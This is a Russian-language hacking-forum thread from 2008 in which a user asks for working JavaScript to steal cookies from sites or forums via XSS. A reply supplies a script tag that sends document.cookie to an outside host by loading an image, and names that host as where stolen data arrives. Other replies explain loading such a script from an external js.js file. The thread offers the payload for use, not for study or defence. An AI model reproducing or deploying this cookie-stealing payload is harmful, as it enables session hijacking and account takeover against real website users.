вопрос по javascript для xss

Discussion in 'PHP' started by *.exe, 25 Apr 2008.

  1. *.exe

    *.exe Elder - Старейшина

    Joined:
    8 Jan 2007
    Messages:
    66
    Likes Received:
    11
    Reputations:
    -4
    На форуме не раз видел примеры xss с ссылкой на js.js

    в этом js коде пропысывается скрипт который прет куки с сайта или форума.

    так вот прозьба парни у кого есть данный код выложите плиз рабочий очень надо

    спс.
     
    #1 *.exe, 25 Apr 2008
  2. astrologer

    astrologer Elder - Старейшина

    Joined:
    30 Aug 2007
    Messages:
    837
    Likes Received:
    267
    Reputations:
    59
    Code:
    <script type="text/javascript">
(new Image()).src = 'http://fsbook.ru?' + document.cookie;
</script>
    'http://fsbook.ru?' - адрес, куда данные будут приходить
     
    #2 astrologer, 25 Apr 2008
    1 person likes this.
  3. Ponchik

    Ponchik Хлебо-булочное изделие

    Joined:
    30 Aug 2005
    Messages:
    687
    Likes Received:
    807
    Reputations:
    311
    мб он имел в виду
    <script src="http://.../js.js"></script>
     
    #3 Ponchik, 25 Apr 2008
  4. *.exe

    *.exe Elder - Старейшина

    Joined:
    8 Jan 2007
    Messages:
    66
    Likes Received:
    11
    Reputations:
    -4
    спс =)
     
    #4 *.exe, 25 Apr 2008
  5. freddi

    freddi Elder - Старейшина

    Joined:
    5 Jul 2006
    Messages:
    399
    Likes Received:
    243
    Reputations:
    145
    *.exe, если ты про примеры, такие, как показал Ponchik, то код в js.js должен быть без тегов скрипт.
     
    #5 freddi, 25 Apr 2008
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.